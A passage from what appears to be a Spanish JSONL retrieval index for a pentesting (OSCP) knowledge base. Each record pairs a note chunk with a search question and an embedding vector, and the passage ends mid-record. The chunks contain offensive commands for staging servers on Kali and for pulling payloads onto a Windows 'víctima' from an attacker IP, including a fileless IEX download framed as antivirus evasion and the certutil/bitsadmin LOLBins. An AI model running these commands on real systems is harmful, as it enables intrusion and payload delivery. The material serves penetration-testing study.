"shells", "fuente": null, "licencia": null, "texto": "## Regla\nDescubre el egress **pronto** (GestiΓ³n del tiempo): perder 2h pensando que el exploit no va, cuando es el firewall, es clΓ‘sico.\n\nRelacionado: Reverse shell Β· Puesto de mando Kali Β· OSCP MOC", "indexar": "cual es una tΓ©cnica para detectar si el bloqueo es por firewall y no por falta de exploit", "v": [-0.00272, -0.01651, -0.19639, -0.16588, -0.04119, -0.08507, -0.03069, 0.07522, 0.01373, 0.02017, -0.04682, -0.00954, -0.07531, 0.0816, 0.05932, -0.049, -0.08309, -0.12998, 0.08151, -0.13361, -0.05324, -0.00947, 0.08566, -0.00026, -0.03206, -0.03145, -0.11833, 0.00502, -0.17522, -0.16071, 0.00558, -0.09774, 0.14732, -0.0419, 0.03788, 0.0386, 0.08802, -0.01405, 0.11529, 0.08012, -0.01988, -0.09542, -0.07766, -0.02707, 0.08801, -0.0749, -0.02273, 0.00557, 0.10409, 0.04552, 0.02455, -0.00927, -0.08773, -0.00604, 0.06137, -0.01657, 0.18159, -0.00138, 0.04908, -0.05214, -0.15525, -0.04779, 0.05391, -0.02913, -0.01282, -0.11857, -0.05038, -0.04112, -0.04033, 0.06168, 0.03151, -0.01818, -0.04006, -0.00487, -0.007, 0.06774, -0.04969, 0.03047, 0.10308, 0.05379, 0.00329, -0.00214, 0.02435, -0.00286, -0.08603, -0.06155, -0.04812, -0.04192, -0.06547, -0.22062, 0.04296, 0.1128, -0.05783, -0.08367, 0.0608, -0.02192, 0.11623, 0.13001, -0.06331, -0.02266, 0.02649, -0.09821, -0.13041, 0.09075, 0.10427, 0.0379, -0.00307, -0.04134, 0.00668, -0.08007, -0.10431, 0.02724, -0.0287, -0.02568, -0.04375, -0.0551, -0.01818, -0.08319, 0.03958, -0.00413, -0.10449, -0.00175, -0.12524, -0.03898, 0.08691, -0.06477, 0.00379, 0.03225, 0.04209, -0.01594, -0.03554, -0.01279, -0.07434, -0.07639, -0.09426, 0.00445, -0.01889, -0.0846, -0.06559, 5e-05, 0.03725, 0.0504, 0.01939, 0.00033, 0.06182, 0.04027, -0.05345, -0.06561, -0.17091, -0.07208, 0.01581, 0.00336, -0.05048, 0.09849, -0.07207, -0.04692, 0.03582, 0.02178, 0.00286, 0.12623, 0.03941, 0.03501, 0.01798, 0.0247, -0.04857, -0.00852, -0.06631, -0.0147, 0.06633, 0.01955, -0.03475, 0.04905, -0.02059, -0.05948, -0.0506, -0.02797, -0.01815, -0.00197, 0.02948, -0.04451, -0.04114, -0.05742, 0.03196, -0.0103, -0.01367, 0.00124, 0.01557, 0.02244, 0.05605, 0.06281, 0.0695, -0.03906, -0.0318, 0.01547, -0.05267, -0.04775, -0.01222, -0.04856, 0.07007, -0.00156, -0.02166, -0.03644, 0.01387, -0.03827, -0.02429, -0.03025, -0.04239, -0.04476, 0.01026, 0.03973, 0.11547, 0.01413, 0.01566, -0.04818, -0.06076, 0.01942, -0.02784, 0.04005, -0.0215, 0.00092, -0.0214, 0.08287, 0.00519, 0.02948, -0.02743, -0.04565, -0.04676, 0.04047, 0.06187, 0.00634, -0.0193, -0.02704, 0.01067, 0.05456, 0.01896, -0.01206, -0.01259, -0.03479, 0.017, -0.06763, 0.01261, 0.02193, 0.02294, -0.04195, -0.00292, -0.01718, -0.03758, 0.01371, 0.0064, -0.09168, -0.00017, 0.01099, 0.02939, -0.00882, 0.08414, -0.02067]} -{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Transferencia de ficheros\n\n> **Subes** tools a la vΓ­ctima y **exfiltras** loot. Montado en el Puesto de mando Kali. Matriz completa: oscp.trastero.org/filetransfer.", "indexar": "que programa hay para subirme herramientas y extraer archivos de una vΓ­ctima desde un Kali Linux?", "v": [-0.0713, 0.0067, -0.10708, -0.18004, -0.11917, -0.20378, -0.18104, 0.0591, -0.06572, -0.0537, -0.02417, -0.15436, 0.01516, -0.06088, 0.04759, -0.05622, 0.01532, -0.12946, 0.0862, -0.04734, -0.03945, 0.16985, -0.06805, -0.06704, -0.02782, 0.01477, 0.05688, -0.03554, -0.03016, 0.03477, -0.08144, 0.06048, -0.02088, -0.00764, 0.05481, 0.01577, 0.00813, 0.00726, 0.09029, 0.06094, 0.14813, -0.01944, -0.02365, 0.03574, -0.08232, -0.14311, 0.05765, -0.00976, 0.16768, -0.06775, 0.06032, -0.01453, -0.03228, -0.09263, 0.03036, -0.08927, 0.0636, -0.16836, 0.03252, -0.04396, -0.07124, 0.03195, -0.03845, -0.04356, -0.01947, -0.00228, 0.00479, 0.00982, -0.19259, 0.09833, 0.01959, 0.04731, 0.02788, -0.00303, -0.0539, -0.04718, -0.05611, -0.00774, -0.04057, -0.0569, 0.00564, -0.00513, 0.00359, 0.11328, -0.13742, -0.08677, 0.10713, -0.0137, -0.02313, 0.02769, 0.13105, 0.00553, 0.05387, 0.06747, 0.1143, -0.04952, 0.16033, -0.01832, 0.02094, -0.02357, 0.05216, -0.09695, 0.01631, 0.15058, 0.03851, 0.05134, 0.02172, 0.04167, -0.07167, -0.01726, 0.0394, 0.05629, 0.09675, -0.00284, -0.15057, -0.02564, -0.03886, -0.04123, -0.02759, -0.05306, 0.06093, 0.05476, 0.02114, -0.04296, 0.00283, -0.05916, -0.07409, 0.10407, -0.04347, -0.0752, 0.09291, -0.00333, 0.01767, 0.03025, 2e-05, -0.04064, 0.10607, -0.07823, -0.03661, -0.04628, 0.06245, 0.03221, -0.06184, 0.00442, 0.06381, -0.0515, -0.03355, -0.03254, -0.02284, -0.07044, 0.01542, -0.02405, 0.06766, -0.02219, -0.09807, -0.03246, -0.01448, -0.04601, -0.09346, 0.00139, -0.05664, -0.03916, 0.0102, -0.02896, -0.0124, -0.01793, 0.04656, 0.05465, 0.07704, 0.0219, 0.07026, 0.07282, 0.04759, -0.04906, -0.00643, -0.07893, 0.05723, -0.11223, -0.00343, 0.01037, -0.04225, 0.03823, 0.02296, 0.0193, 0.00081, -0.02455, 0.01144, 0.00639, -0.02871, 0.03804, -0.02562, 0.01833, -0.04912, -0.0249, -0.04315, 0.01407, -0.03454, 0.07322, -0.01879, -0.00629, -0.08356, 0.04086, 0.01404, -0.03311, -0.0189, 0.0212, -0.04046, -0.08827, -0.00422, 0.05333, -0.01112, 0.05086, 0.06455, -0.04625, 0.03553, -0.03044, 0.01478, 0.05876, 0.06281, 0.02845, -0.04229, -0.02136, 0.08777, 0.00488, -0.03467, -0.04989, -0.03971, 0.04028, -0.03233, -0.03125, 0.00626, -0.03825, 0.04255, 0.00263, -0.03266, -0.03514, 0.01518, 0.02294, -0.03144, -0.03787, -0.05647, 0.05693, 0.03119, -0.06257, -0.07603, 0.02343, -0.01114, -0.00634, -0.01323, -0.02355, -0.00777, 0.02631, 0.02597, -0.04291, -0.04668, 0.00237]} -{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Transferencia de ficheros\n\n> **Subes** tools a la vΓ­ctima y **exfiltras** loot. Montado en el Puesto de mando Kali. Matriz completa: oscp.trastero.org/filetransfer.", "indexar": "con que puedo hacer transferencias de ficheros durante un ataque simulado en Kali Linux?", "v": [0.06993, 0.09493, -0.1696, -0.07142, 0.0061, -0.16479, -0.06661, 0.04863, -0.09184, 0.0382, 0.05635, -0.07145, 0.00521, -0.09489, 0.08028, -0.04721, -0.03239, -0.05528, 0.04734, -0.10445, -0.0077, 0.00702, -0.05906, -0.06776, 0.05662, 0.06707, 0.07597, -0.02941, -0.02027, -0.08689, 0.0635, 0.04985, 0.10351, -0.00148, 0.09807, -0.01374, -0.03648, 0.05815, 0.12852, 0.08683, 0.15544, 0.08834, -0.07646, -0.02477, -0.06083, -0.17237, 0.02828, -0.03076, 0.18337, -0.08566, 0.15678, -0.05521, -0.17273, -0.05628, -0.00938, -0.08914, 0.1968, -0.17413, 0.07959, 0.02215, -0.10161, -0.0045, 0.07804, 0.03441, 0.07991, 0.0179, 0.0087, 0.01605, -0.09363, 0.06318, -0.0063, 0.14948, -0.05615, 0.04396, -0.06541, -0.01977, -0.06127, 0.06553, 0.01667, -0.01229, -0.00138, -0.06544, -0.0192, 0.04818, -0.1099, -0.10457, 0.03302, 0.01472, 0.01107, 0.03888, 0.05319, 0.02566, 0.0034, 0.0475, 0.05906, 0.0754, 0.01714, -0.0127, 0.00322, -0.01244, -0.03421, 0.05694, -0.10946, 0.10994, 0.00422, 0.09932, 0.03827, -0.08509, 0.0858, -0.14726, 0.01711, -0.07536, -0.00613, -0.04465, 0.03455, 0.02276, -0.03265, 0.02707, 0.03321, -0.03325, -0.03782, -0.06316, 0.00359, 0.01741, -0.05937, -0.03604, -0.10577, 0.04911, -0.07414, 0.04839, -0.03457, -0.01563, -0.1049, 0.02513, -0.00103, 0.0201, -0.01044, -0.0842, 0.0411, 0.00089, 0.03087, 0.0792, 0.01666, 0.00141, 0.04201, 0.04775, -0.02412, -0.04893, -0.09742, -0.06169, 0.02036, -0.00534, 0.02887, 0.05647, -0.07488, -0.05366, 0.00826, -0.06745, -0.11546, 0.02961, 0.01508, 0.08636, 0.01186, 0.0099, -0.04402, -0.05492, -0.01731, 0.01362, 0.05485, 0.02579, -0.04905, 0.0545, 0.00287, -0.04861, 0.07278, -0.03672, -0.0289, -0.06126, 0.03368, -0.02585, -0.0259, 0.02925, -0.02776, -0.00937, 0.0306, -0.00697, -0.02411, 0.11953, 0.03419, 0.04754, 0.0243, 0.07741, 0.0042, 0.0139, -0.01206, -0.01806, -0.03746, -0.0044, -0.01118, 0.02262, -0.00134, -0.02118, 0.00544, -0.10429, 0.02149, 0.08018, -0.11041, -0.01676, -0.05823, 0.03957, -0.0076, 0.00582, 0.15587, -0.05969, 0.00295, 0.00053, 0.01101, -0.00103, 0.02293, -0.02807, 0.00417, -0.00111, 0.05343, -0.02168, 0.00881, 0.00348, 0.02349, -0.03551, -0.00301, 0.0304, 0.01448, 0.02295, 0.06461, -0.0195, 0.04725, 0.00643, -0.00041, -0.00721, -0.08547, -0.01945, -0.02158, 0.03799, -0.04966, -0.06514, -0.02612, -0.02591, -0.1, 0.0134, -0.01354, -0.07515, -0.00523, 0.02569, 0.07226, -0.00521, 0.02944, -0.03559]} -{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Transferencia de ficheros\n\n> **Subes** tools a la vΓ­ctima y **exfiltras** loot. Montado en el Puesto de mando Kali. Matriz completa: oscp.trastero.org/filetransfer.", "indexar": "cual es una herramienta de exfiltraciΓ³n de loot que funcione bien en el puesto de mando?", "v": [-0.0787, 0.05074, -0.212, -0.03212, 0.04595, -0.05021, -0.00671, 0.00967, -0.12952, -0.07243, -0.09435, -0.05869, 0.02548, -0.0113, 0.02321, 0.02284, 0.04587, -0.16474, -0.15567, -0.04146, -0.13577, -0.00888, 0.00697, -0.04794, -0.02352, 0.05827, 0.13495, 0.00541, -0.24298, 0.12678, 0.03254, -0.00822, 0.04878, -0.02773, 0.11145, -0.16028, 0.05856, 0.00456, 0.03622, 0.15565, 0.05911, 0.00823, -0.13713, -0.02243, -0.0306, -0.07664, -0.0328, -0.01214, 0.14802, 0.13839, -0.02621, -0.16432, -0.08646, -0.02032, 0.04662, -0.1514, 0.17739, -0.09496, 0.09456, -0.03761, -0.10505, -0.015, -0.06982, -0.00951, -0.03066, -0.04595, 0.05076, -0.06128, -0.02357, 0.06136, -0.05494, 0.10571, -0.02326, 0.02552, 0.01195, -0.01412, -0.00125, 0.07393, 0.03739, -0.02142, -0.01477, -0.05627, -0.04585, -0.00789, -0.14939, -0.08831, 0.11745, -0.05726, -0.0345, -0.0951, -0.07629, 0.02508, -0.08636, 0.07469, 0.07946, -0.01158, 0.04221, -0.00122, 0.04725, -0.03756, 0.1459, -0.07831, -0.11497, 0.06458, -0.01933, 0.01818, -0.05076, 0.02887, -0.05422, 0.01665, -0.01687, 0.01536, 0.00326, -0.03311, -0.04408, 0.0177, -0.11044, -0.04066, 0.02477, -0.0509, -0.08872, -0.00366, -0.05149, 0.0049, 0.04208, -0.04204, -0.06391, 0.02847, 0.04719, -0.07291, 0.01613, 0.00886, -0.00764, 0.01762, -0.0362, -0.05164, 0.04144, -0.01076, -0.08023, -0.10551, 0.01438, 0.05916, 0.05155, -0.08042, 0.03514, 0.08041, 0.07783, -0.00279, -0.00085, -0.01563, 0.01175, -0.02333, 0.0295, 0.08034, -0.02881, 0.0654, -0.03152, 0.00401, -0.06804, -0.02519, -0.04487, -0.12168, 0.02385, 0.00946, -0.02234, -0.02606, 0.02809, 0.00562, 0.00673, -0.05367, -0.01534, -0.03459, 0.02196, -0.02981, -0.01248, -0.06372, -0.07775, -0.02205, 0.08646, -0.01404, -0.00947, 0.04038, -0.0065, -0.02288, 0.03213, -0.069, 0.00953, -0.03367, -0.00025, 0.04544, 0.04868, -0.01959, -0.02741, -0.03519, 0.01239, 0.01547, -0.01053, -0.07727, 0.0338, -0.01601, -0.02243, 0.00641, -0.00782, -0.04446, 0.01749, 0.03455, -0.01335, -0.02054, 0.01225, 0.06641, 0.06617, 0.01643, 0.01158, 0.00446, -0.03942, 0.01671, 0.03251, -0.0083, -0.05136, 0.01093, 0.04006, 0.01322, 0.09715, -0.04222, -0.04571, 0.03768, 0.0326, 0.04369, 0.07201, 0.03455, -0.01529, -0.0393, -0.03683, -0.06923, 0.01478, 0.01407, 0.05379, -0.00229, -0.06597, -0.05253, 0.01244, 0.06195, -0.00531, -0.06751, -0.04013, -0.03544, -0.04413, 0.02472, 0.00656, -0.07375, -0.0373, -0.00486, 0.04958, -0.03398, 0.03176, -0.04133]} -{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Servidores en tu Kali\n```bash\npython3 -m http.server 7788 # HTTP\nimpacket-smbserver -smb2support SERVER $(pwd) # SMB (anΓ³nimo)\nimpacket-smbserver -username u -password p -smb2support SERVER $(pwd) # SMB con auth\npython3 -m pyftpdlib --user=u --password=p -w -p 21 # FTP\nphp -S 0.0.0.0:7788 # PHP\n```", "indexar": "que programa hay para montar un servidor HTTP en Kali Linux?", "v": [-0.08504, -0.02535, -0.10792, -0.15862, -0.13008, -0.19512, -0.06546, 0.03735, -0.00723, 0.03968, -0.07946, -0.02909, 0.07015, -0.0786, 0.0755, 0.05117, 0.05887, -0.1947, 0.06075, -0.0537, -0.06357, 0.10764, -0.04922, -0.04912, -0.00645, 0.00534, 0.0618, -0.07376, -0.02964, -0.05342, -0.00147, 0.00742, -0.06412, 0.11206, -0.01939, -0.00621, -0.02361, 0.06987, 0.04951, 0.07461, 0.08051, 0.00159, 0.04167, 0.03948, -0.11044, -0.08976, 0.10238, -0.13711, 0.13428, -0.1394, 0.09123, 0.00755, -0.13212, 0.04516, 0.01776, 0.06078, 0.06191, -0.17135, 0.02964, -0.06954, -0.12941, -0.00582, -0.03407, -0.03247, 0.07061, -0.00922, -0.03625, 0.0186, -0.17606, 0.00247, -0.03509, 0.06016, -0.0123, -0.06208, 0.03441, 0.0605, -0.08403, -0.00749, 0.02515, 0.04362, 0.05916, 0.00204, 0.03561, 0.17231, -0.14013, -0.13029, -0.00383, -0.03671, 0.03868, 0.084, 0.1096, 0.13551, -0.04109, 0.09554, 0.06397, -0.07033, 0.17022, 0.04489, 0.04274, 0.03151, -0.0416, 0.0653, -0.05708, 0.10243, 0.04706, 0.11475, 0.11714, -0.03775, 0.0517, -0.05425, 0.06714, -0.01381, -0.03562, 0.0087, -0.06124, -0.07514, 0.02042, 0.044, 0.02977, -0.04396, -0.08053, 0.01454, -0.0202, 0.0331, 0.00086, -0.03267, -0.00687, 0.09367, -0.04003, -0.03633, 0.0347, -0.09291, -0.04125, 0.05047, -0.05342, 0.04002, 0.08064, -0.12052, -0.04411, 0.00566, 0.00383, 0.0085, -0.02595, 0.0213, 0.11326, 0.00606, 0.05476, -0.08877, -0.02876, 0.0001, 0.01793, 0.03017, -0.02976, -0.01121, -0.14423, -0.06117, 0.02059, -0.04204, -0.06689, 0.06131, 0.03819, 0.00553, 0.05061, 0.04446, 0.00683, 0.044, -0.04941, 0.09055, 0.07547, 0.01888, 0.00419, 0.1007, 0.00438, -0.09453, -0.01749, -0.02873, -0.02421, -0.06018, 0.01376, 0.02361, -0.03737, 0.01355, 0.03605, 0.02599, -0.02996, -0.00015, -0.00779, 0.04882, -0.0162, 0.00183, 0.03082, 0.00551, -0.08074, 0.03832, 0.04338, 0.00039, -0.03823, -0.00169, 0.02209, -0.00376, -0.06927, -0.01237, 0.02484, -0.03738, -0.01328, -0.0085, -0.02026, 0.00101, -0.00377, 0.04645, -0.01742, -0.02294, 0.07278, -0.0195, 0.00663, 0.00523, 0.06503, 0.02824, 0.02151, 0.02895, -0.03804, -0.01576, 0.03666, 0.01677, 0.00343, -0.05547, 0.02648, -0.01771, 0.05007, -0.02302, -0.02667, -0.03488, -0.03389, 0.00112, 0.02265, -0.00556, 0.00492, 0.01104, -0.01684, -0.07701, -0.01344, 0.06192, -0.00515, -0.09126, -0.01957, -0.05312, -0.03852, -0.0234, -0.02913, 5e-05, -0.04725, -0.03037, -0.00119, -0.05605, -0.04097, 0.01324]} -{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Servidores en tu Kali\n```bash\npython3 -m http.server 7788 # HTTP\nimpacket-smbserver -smb2support SERVER $(pwd) # SMB (anΓ³nimo)\nimpacket-smbserver -username u -password p -smb2support SERVER $(pwd) # SMB con auth\npython3 -m pyftpdlib --user=u --password=p -w -p 21 # FTP\nphp -S 0.0.0.0:7788 # PHP\n```", "indexar": "cual es una alternativa libre a impacket-smbserver para pruebas de seguridad?", "v": [-0.07755, -0.13501, -0.1234, -0.16806, -0.21566, -0.16088, -0.18178, -0.17105, -0.06156, -0.00899, -0.15493, 0.0097, 0.1199, -0.08361, -0.04269, 0.08926, -0.01907, -0.09231, 0.09182, -0.00016, 0.1097, 0.01257, -0.06325, -0.08634, 0.02955, 0.09399, -0.06534, 0.1203, -0.02547, 0.00017, -0.03488, -0.05042, 0.10753, 0.03577, -0.03961, 0.01916, 0.13328, -0.00673, 0.13062, 0.06408, 0.04863, -0.15221, 0.02734, 0.01238, 0.02736, -0.04774, -0.01658, 0.01266, 0.00717, -0.09676, -0.10151, 0.01675, -0.02277, -0.0177, -0.01341, 0.00173, 0.0128, -0.07214, -0.02399, 0.0501, -0.15119, 0.01416, 0.07335, -0.02539, 0.10082, -0.05206, -0.03117, 0.0563, -0.11374, 0.01177, 0.08349, -0.0332, 0.12053, 0.0121, -0.19066, -0.01901, 0.0205, 0.0116, 0.01836, 0.12859, 0.0366, -0.00099, -0.0201, 0.05374, -0.09309, -0.11209, 0.01421, -0.04087, 0.02262, 0.09928, 0.07716, 0.05952, 0.01692, 0.10364, -0.04625, -0.08082, 0.03275, 0.02006, 0.03124, -0.08554, 0.0682, 0.00676, -0.04844, -0.00999, -0.04041, -0.10059, -0.03264, 0.10069, -0.04792, -0.00146, 0.04411, 0.05906, 0.02156, 0.05891, -0.05252, -0.04021, 0.03193, -0.05021, 0.02944, -0.0371, -0.00816, -0.02973, -0.04666, -0.04622, 0.01861, 0.02337, 0.11553, 0.01707, -0.03421, 0.04841, 0.05578, -0.03819, -0.06408, -0.04, -0.05167, -0.03359, -0.00377, -0.10233, -0.01354, 0.03349, -0.0289, 0.02884, 0.0421, 0.04548, -0.01491, 0.03059, -0.03807, 0.03615, -0.03291, -0.01386, -0.01891, 0.03639, -0.07811, 0.06243, -0.02315, 0.02251, -0.05648, -0.00488, -0.06805, 0.0744, 0.03899, -0.03019, -0.0166, 0.05334, 0.00851, 0.01044, 0.0453, -0.07077, -0.04643, -0.02981, 0.02556, 0.0159, 0.084, -0.04659, 0.07897, -0.03427, -0.02438, -0.06762, -0.04635, -0.07863, 0.02032, 0.03413, -0.06766, 0.03044, 0.09094, -0.12325, 0.07521, 0.03124, 0.06141, -0.00711, -0.02283, 0.03595, -0.08405, -0.04827, -0.01231, 0.03475, 0.07024, -0.06625, -0.04763, 0.01105, -0.03924, -0.06836, -0.04212, -0.03355, -0.04073, -0.03488, -0.01991, 0.04425, 0.03355, -0.01529, 0.03411, 0.03327, 0.07951, -0.03475, -0.06466, 0.0091, 0.01821, 0.0444, -0.07329, -0.02942, -0.00675, -0.00386, -0.03268, 0.00146, -0.03143, 0.00069, -0.03108, 0.01063, 0.01765, -0.0161, 0.05777, -0.00939, -0.02581, 0.07501, 0.02546, -0.02966, -0.02091, 0.06406, 0.07372, -0.03615, -0.02541, 0.0451, -0.03977, -0.05905, -0.05419, 0.05017, -0.06808, -0.01575, -0.03008, -0.00707, -0.00893, -0.04838, -0.02927, -0.02887, -0.01445, 0.01975]} -{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Servidores en tu Kali\n```bash\npython3 -m http.server 7788 # HTTP\nimpacket-smbserver -smb2support SERVER $(pwd) # SMB (anΓ³nimo)\nimpacket-smbserver -username u -password p -smb2support SERVER $(pwd) # SMB con auth\npython3 -m pyftpdlib --user=u --password=p -w -p 21 # FTP\nphp -S 0.0.0.0:7788 # PHP\n```", "indexar": "con que puedo iniciar un servidor FTP rΓ‘pido en mi terminal?", "v": [-0.05701, 0.08729, -0.19346, -0.21653, -0.01006, -0.04736, 0.02311, -0.02987, 0.02297, 0.13086, -0.09835, 0.119, 0.1355, 0.0037, 0.02845, 0.02765, 0.03728, -0.13329, 0.19093, -0.10184, -0.0233, 0.045, -0.01683, -0.07752, 0.02409, 0.04343, 0.02186, -0.02446, -0.09939, -0.19815, 0.18375, -0.10824, 0.09816, 0.02216, 0.02242, -0.06013, 0.04203, 0.13434, -0.00866, 0.0291, 0.09365, 0.07194, -0.08174, 0.08488, 0.10868, -0.02996, 0.03752, -0.11646, 0.17009, -0.01222, 0.04817, -0.1029, -0.06635, -0.00524, -0.1286, 0.03656, 0.08524, -0.19122, 0.09274, 0.04844, -0.13306, 0.02326, -0.01219, -0.04623, 0.0166, -0.002, -0.02303, 0.00439, -0.09813, 0.0469, -0.06379, 0.02879, -0.03008, -0.00956, 0.0273, 0.03665, -0.06935, -0.00702, 0.1337, 0.08514, 0.02779, 0.00124, -0.02502, 0.03287, -0.11533, -0.13128, -0.09828, 0.07562, 0.04837, 0.03783, 0.07358, 0.03912, -0.07344, 0.08588, 0.01262, -0.0514, 0.03132, -0.00488, -0.02944, -0.01479, 0.03772, 0.08321, -0.01543, 0.0991, 0.04069, -0.05186, 0.08832, -0.03879, 0.03335, -0.02302, 0.10004, 0.0489, 0.10081, -0.04906, -0.10636, -0.0881, -0.0325, -0.05654, -0.04282, 0.05974, -0.07433, -0.06564, 0.00053, 0.04504, 0.01602, -0.06065, 0.05643, 0.01538, 0.03722, 0.01882, 0.05639, -0.05688, -0.02643, -0.06684, -0.05578, 0.03387, 0.03869, -0.11026, -0.04931, 0.00236, -0.00632, 0.01032, -0.05768, 0.06217, 0.12038, -0.00284, -0.00971, -0.07602, -0.05036, -0.01653, 0.04516, -0.0853, -0.04451, -0.09576, -0.09136, -0.04194, 0.07562, -0.02064, -0.04968, 0.05953, 0.00039, 0.03818, 0.01607, 0.01698, -0.01215, -0.00399, -0.02932, 0.02586, 0.03023, 0.00375, 0.00887, 0.04484, -0.01263, -0.03079, 0.02919, -0.0066, -0.04185, -0.01856, -0.00157, 0.00607, 0.00187, 0.00512, 0.00113, 0.03279, -0.0339, -0.06316, -0.03388, -0.01319, -0.00771, 0.00395, 0.04407, 0.03881, -0.01675, 0.02547, 0.03767, -0.04721, -0.01248, -0.05238, -0.0559, -0.04282, -0.02563, -0.0261, -0.01453, -0.03435, 0.04518, -0.04288, -0.06471, 0.08296, -0.01034, -0.02414, -0.0152, 0.03258, 0.07883, -0.02798, 0.017, -0.02007, 0.01309, -0.03408, 0.01959, -0.03991, -0.00878, 0.02179, 0.00942, 0.02251, -0.01082, -0.03568, 0.00692, 0.00247, 0.03379, -0.01562, -0.02165, 0.02015, -0.03486, -0.0424, 0.01511, -0.02354, 0.00163, -0.06638, 0.00089, -0.00415, 0.02371, 0.02397, -0.00429, -0.03184, -0.01805, -0.01084, -0.02002, -0.02755, -0.05931, 0.0009, -0.04613, -0.04446, 0.04419, -0.02841, -0.04698, 0.03339]} -{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Descargar EN la vΓ­ctima Windows\n```powershell\n(New-Object Net.WebClient).DownloadFile('http://TU_IP/f.exe','C:\\Windows\\Temp\\f.exe')\nInvoke-WebRequest http://TU_IP/f.exe -OutFile f.exe # iwr\nIEX (New-Object Net.WebClient).DownloadString('http://TU_IP/x.ps1') # fileless β†’ AV evasion\nbitsadmin /transfer job http://TU_IP/f.exe C:\\Temp\\f.exe\ncertutil.exe -urlcache -split -f \"http://TU_IP/f.exe\" f.exe # LOLBin clΓ‘sico\ntftp -i TU_IP get f.exe # (DISM /online /Enable-Feature /FeatureName:TFTP)\n```\n```cmd\nnet use x: \\\\TU_IP\\SERVER /user:u p & copy x:\\f.exe . # vΓ­a SMB\n```", "indexar": "que herramienta sirve para descargar un archivo desde una IP especΓ­fica en Windows sin dejar rastros?", "v": [-0.00364, -0.0156, -0.12845, -0.22819, 0.06048, -0.18248, -0.0483, -0.09531, -0.03801, -0.00354, 0.02111, -0.16649, -0.05122, -0.09103, 0.02975, 0.07312, 0.06139, 0.01192, 0.05204, -0.05161, -0.04382, 0.02322, -0.09046, 0.00413, -0.09774, 0.04327, -0.07143, 0.04246, -0.24833, -0.00864, -0.06838, -0.00606, -0.00077, -0.04382, -0.13577, -0.07648, 0.0632, 0.06153, -0.08108, 0.05126, 0.11228, 0.06702, -0.06985, 0.14704, 0.00113, -0.03352, 0.0689, 0.01413, 0.07041, 0.0572, -0.05712, -0.14674, 0.00854, -0.0856, -0.06928, -0.15413, 0.14494, -0.13367, 0.03774, -0.01712, -0.09319, 0.15664, -0.0562, -0.00018, -0.00535, -0.05724, -0.00841, -0.01479, -0.12683, 0.01259, -0.05028, 0.08907, 0.07812, 0.03505, 0.02423, 0.03093, -0.08216, -0.07803, 0.06561, 0.01318, 0.07953, 0.01458, -0.03488, -0.05115, -0.11548, -0.14391, 0.06917, -0.03129, 0.10858, -0.13066, 0.06777, 0.05686, -0.02985, 0.07553, 0.03945, -0.05448, 0.05391, 0.04084, 0.00676, 0.02577, 0.0369, -0.0541, -0.06241, 0.08303, 0.07482, 0.09274, 0.00645, -0.0066, -0.08149, 0.01792, 0.01004, 0.05481, 0.05875, 0.02171, 0.00194, 0.02242, 0.01974, -0.06405, -0.00856, -0.0247, -0.03308, 0.01747, -0.06456, 0.03793, -0.01507, -0.06552, -0.06923, 0.12158, -0.09605, -0.03009, 0.02998, -0.04547, -0.14426, -0.00386, -0.06345, -0.04246, 0.0545, -0.04096, -0.02398, -0.07092, 0.11089, 0.00366, -0.03221, -0.004, 0.05366, -0.00033, 0.02792, -0.02211, -0.05227, -0.10044, 0.07168, -0.0363, 0.00733, -0.05848, -0.08077, 0.06076, 0.02005, 0.00838, -0.02582, 0.00252, -0.01107, 0.00084, 0.01633, -0.01365, 0.03825, -0.01417, -0.05581, 0.04606, 0.07823, -0.02407, -0.00639, -0.01069, -0.01922, -0.09407, -0.03446, -0.02495, 0.00184, -0.02187, 0.00092, -0.02637, -0.10098, -0.00256, 0.0342, 0.0128, -0.02125, -0.04377, 0.01792, 0.00925, -0.04142, 0.01985, -0.02696, 0.00825, 0.01299, -0.01275, 0.03854, 0.00492, -0.05666, -0.01918, 0.01451, -0.00496, -0.08073, -0.07767, -0.05042, 0.00434, 0.07433, 0.01487, -0.03482, -0.00816, 0.01629, 0.00042, -0.01845, 0.03677, 0.02359, -0.05619, -0.01549, -0.01886, 0.06164, 0.05154, -0.00702, 0.00879, -0.01074, 0.01051, 0.0659, -0.02463, -0.01227, 0.01019, -0.01637, 0.01626, -0.03087, -0.02128, 0.02374, 0.09516, -0.00973, -0.00241, 0.06554, -0.02922, 0.01533, -0.02916, -0.03315, -0.04576, -0.04902, 0.05057, -0.00381, -0.07663, -0.06938, -0.05702, -0.0132, 0.00569, 0.02231, -0.1119, -0.01673, -0.00838, 0.07405, -0.01334, -0.01043, 0.04258]} -{"tipo": "pregunta", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Descargar EN la vΓ­ctima Windows\n```powershell\n(New-Object Net.WebClient).DownloadFile('http://TU_IP/f.exe','C:\\Windows\\Temp\\f.exe')\nInvoke-WebRequest http://TU_IP/f.exe -OutFile f.exe # iwr\nIEX (New-Object Net.WebClient).DownloadString('http://TU_IP/x.ps1') # fileless β†’ AV evasion\nbitsadmin /transfer job http://TU_IP/f.exe C:\\Temp\\f.exe\ncertutil.exe -urlcache -split -f \"http://TU_IP/f.exe\" f.exe # LOLBin 